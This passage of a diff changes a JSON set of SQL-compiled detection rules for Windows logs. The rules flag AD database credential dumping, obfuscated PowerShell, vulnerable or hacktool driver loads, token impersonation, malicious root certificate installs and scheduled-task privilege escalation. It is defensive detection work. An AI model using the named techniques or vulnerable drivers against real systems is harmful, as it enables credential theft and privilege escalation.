LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADComputer %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" ], - "filename": "posh_pm_get_addbaccount.yml" + "filename": "proc_creation_win_powershell_computer_discovery_get_adcomputer.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", - "id": 
"ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "title": "Root Certificate Installed From Susp Locations", + "id": "5f6a601c-2ecb-498b-9c33-660362323afa", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1553.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" }, { - "title": "Process Hacker and System Informer Driver Load", - "id": "67add051-9ee7-4ad3-93ba-42935615ae8d", + "title": "HackTool - Impersonate Execution", + "id": "cf0c254b-22f1-4b2b-8221-e137b3c0af94", "status": "experimental", - "description": "Detects the load of drivers used by Process Hacker and 
System Informer", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "author": "Sai Prashanth Pulisetti @pulisettis", "tags": [ "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" ], "falsepositives": [ - "Legitimate user of process hacker or system informer by low level developers or system administrators" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemInformer.sys' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=821D74031D3F625BCBD0DF08B70F1E77%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F86759BB4DE4320918615DC06E998A39%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A64EEB85419257D0CE32BD5D55C3A18%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6E7B34DFC017700B1517B230DF6FF0D0%' ESCAPE '\\') OR Imphash IN ('821D74031D3F625BCBD0DF08B70F1E77', 'F86759BB4DE4320918615DC06E998A39', '0A64EEB85419257D0CE32BD5D55C3A18', '6E7B34DFC017700B1517B230DF6FF0D0') OR (Hashes LIKE '%SHA256=8B9AD98944AC9886EA4CB07700E71B78BE4A2740934BB7E46CA3B56A7C59AD24%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A41348BEC147CA4D9EA2869817527EB5CEA2E20202AF599D2B30625433BCF454%' ESCAPE '\\' OR Hashes LIKE '%SHA256=38EE0A88AF8535A11EFE8D8DA9C6812AA07067B75A64D99705A742589BDD846D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A773891ACF203A7EB0C0D30942FB1347648F1CD918AE2BFD9A4857B4DCF5081B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4C3B81AC88A987BBDF7D41FA0AECC2CEDF5B9BD2F45E7A21F376D05345FC211D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3241BC14BEC51CE6A691B9A3562E5C1D52E9D057D27A3D67FD0B245C350B6D34%' ESCAPE '\\' OR Hashes LIKE '%SHA256=047C42E9BBA28366868847C7DAFC1E043FB038C796422D37220493517D68EE89%' ESCAPE '\\' OR 
Hashes LIKE '%SHA256=18931DC81E95D0020466FA091E16869DBE824E543A4C2C8FE644FA71A0F44FEB%' ESCAPE '\\' OR Hashes LIKE '%SHA256=B4C2EF76C204273132FDE38F0DED641C2C5EE767652E64E4C4071A4A973B6C1B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=640954AFC268565F7DAA6E6F81A8EE05311E33E34332B501A3C3FE5B22ADEA97%' ESCAPE '\\' OR Hashes LIKE '%SHA256=251BE949F662C838718F8AA0A5F8211FB90346D02BD63FF91E6B224E0E01B656%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E2606F272F7BA054DF16BE464FDA57211EF0D14A0D959F9C8DCB0575DF1186E4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3A9E1D17BEEB514F1B9B3BACAEE7420285DE5CBDCE89C5319A992C6CBD1DE138%' ESCAPE '\\') OR sha256 IN ('8b9ad98944ac9886ea4cb07700e71b78be4a2740934bb7e46ca3b56a7c59ad24', 'a41348bec147ca4d9ea2869817527eb5cea2e20202af599d2b30625433bcf454', '38ee0a88af8535a11efe8d8da9c6812aa07067b75a64d99705a742589bdd846d', 'a773891acf203a7eb0c0d30942fb1347648f1cd918ae2bfd9a4857b4dcf5081b', '4c3b81ac88a987bbdf7d41fa0aecc2cedf5b9bd2f45e7a21f376d05345fc211d', '3241bc14bec51ce6a691b9a3562e5c1d52e9d057d27a3d67fd0b245c350b6d34', '047c42e9bba28366868847c7dafc1e043fb038c796422d37220493517d68ee89', '18931dc81e95d0020466fa091e16869dbe824e543a4c2c8fe644fa71a0f44feb', 'b4c2ef76c204273132fde38f0ded641c2c5ee767652e64e4c4071a4a973b6c1b', '640954afc268565f7daa6e6f81a8ee05311e33e34332b501a3c3fe5b22adea97', '251be949f662c838718f8aa0a5f8211fb90346d02bd63ff91e6b224e0e01b656', 'e2606f272f7ba054df16be464fda57211ef0d14a0d959f9c8dcb0575df1186e4', '3a9e1d17beeb514f1b9b3bacaee7420285de5cbdce89c5319a992c6cbd1de138')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%impersonate.exe%' ESCAPE '\\' AND (CommandLine LIKE '% list %' ESCAPE '\\' OR CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% adduser %' ESCAPE '\\')) OR ((Hashes LIKE '%MD5=9520714AB576B0ED01D1513691377D01%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A%' ESCAPE '\\' OR Hashes LIKE 
'%IMPHASH=0A358FFC1697B7A07D0E817AC740DF62%' ESCAPE '\\') OR md5 = '9520714AB576B0ED01D1513691377D01' OR sha256 = 'E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A' OR Imphash = '0A358FFC1697B7A07D0E817AC740DF62')))" ], - "filename": "driver_load_win_process_hacker.yml" + "filename": "proc_creation_win_hktl_impersonate.yml" }, { - "title": "Vulnerable Lenovo Driver Load", - "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", - "status": "experimental", - "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "title": "Ps.exe Renamed SysInternals Tool", + "id": "18da1007-3f26-470f-875d-f77faf1cab31", + "status": "test", + "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" + "attack.defense_evasion", + "attack.g0035", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Legitimate driver loads (old driver that didn't receive an update)" + "Renamed SysInternals tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine = 'ps.exe -accepteula')" ], - "filename": "driver_load_win_vuln_lenovo_driver.yml" + "filename": 
"proc_creation_win_apt_ta17_293a_ps.yml" }, { - "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", - "id": "295c9289-acee-4503-a571-8eacaef36b28", + "title": "Schtasks From Suspicious Folders", + "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", "status": "experimental", - "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects scheduled task creations that have suspicious action command and folder combinations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%\\%ProgramData\\%%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_hevd_driver.yml" + "filename": "proc_creation_win_schtasks_folder_combos.yml" }, { - "title": "PowerShell Scripts Run by a Services", - "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", + "title": "Potential BearLPE Exploitation", + "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", + "author": "Olaf Hartong", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.privilege_escalation", + "attack.t1053.005", + "car.2013-08-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" ], - "filename": "driver_load_win_powershell_script_installed_as_service.yml" + "filename": "proc_creation_win_exploit_other_bearlpe.yml" }, { - "title": "Vulnerable Driver Load By Name", - "id": "c316eac1-f3d8-42da-ad1c-66dcec5ca787", - "status": "experimental", - "description": "Detects the load of known vulnerable drivers via their names only.", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1068" - ], + "title": "Suspicious Hacktool Execution - Imphash", + "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", + "status": 
"experimental", + "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", - "If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)" + "Legitimate use of one of these tools" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE '%\\\\ADV64DRV.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Agent64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ALSysIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amifldrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsIO.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asmmap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrAutoChkUpdDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv101.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrIbDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrOmgDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrRapidStartDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrSmartConnectDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsUpIO.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atillk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_Def64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CITMDRV\\_AMD64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CITMDRV\\_IA64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz141.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutil\\_2\\_3.sys' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\Dh\\_Kernel\\_10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Dh\\_Kernel.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\GLCKIO2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HOSTNT.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HwRwDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inpoutx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iomem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Mhyprot2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\MsIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msrhook.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NTIOLib.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenLibSys.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Se64a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_namco.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SysInfo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VProEventMonitor.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WCPU.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WINIODrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\physmem.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\procexp152.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viraglt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vboxdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rwdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\speedfan.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sandra.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elbycdio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\goad.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswsnx.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sandbox.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nscm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncpl.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elrawdsk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DBUtilDrv2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_RCIO64.sys' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\EneTechIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amp.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\EneIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ATSZIO.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NalDrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DirectIo32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DirectIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsUpIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv102.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv103.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMEMx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMIXP64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMIx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_Flash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_HWMIO64\\_W10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_HWMIo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_I2c64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\GVCIDrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HwOs2Ec10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HwOs2Ec7x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NBIOLib\\_X64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NCHGBIOS2x64.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NTIOLib\\_X64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PhlashNT.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Phymemx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\UCOREW64.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinFlash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtcBSv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflash.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflsh64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phymem64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow8x64.sys' ESCAPE '\\' OR ImageLoaded 
LIKE '%\\\\segwindrvx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\superbmc.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\semav6msr.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\piddrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BS\\_I2cIo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AMDRyzenMasterDriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LHA.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kEvP64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\BSMI.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TmComm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iQVW64.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iQVW32.SYS' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vmdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HpPortIox64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AMDPowerProfiler.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CorsairLLAccess64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\RTCore64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libnicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\procexp.Sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AsrDrv106.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zamguard64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zam64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fidpcidrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\MsIo32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\IOMap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ATSZIO64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswVmm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FairplayKD.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pgldqpoc.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iqvw64e.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Monitor\\_win10\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvnetbus.sys' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\Mslo64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcdsrvc\\_x64.pkms' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\krpocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HWiNFO64A.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rzpnk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magdrvamd64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86-withoutdbg.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gmer.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PCADRVX64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clfs.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ActiveHealth.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CAM\\_V3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\GameFire.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenHardwareMonitor.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenHardwareMonitorLib.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\OpenHardwareMonitorReport.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SmartDashboard.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemGauge.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemGaugeX7.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VideoNovaServerControllerService.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ellp\\_service.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hardwareproviders.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ohm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sensorsview32\\_64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\touchpointanalyticsclient.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\CQg5Jf.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\HCdRDh.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NcDgDn.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vLTZ19.sys' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', 
'0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', 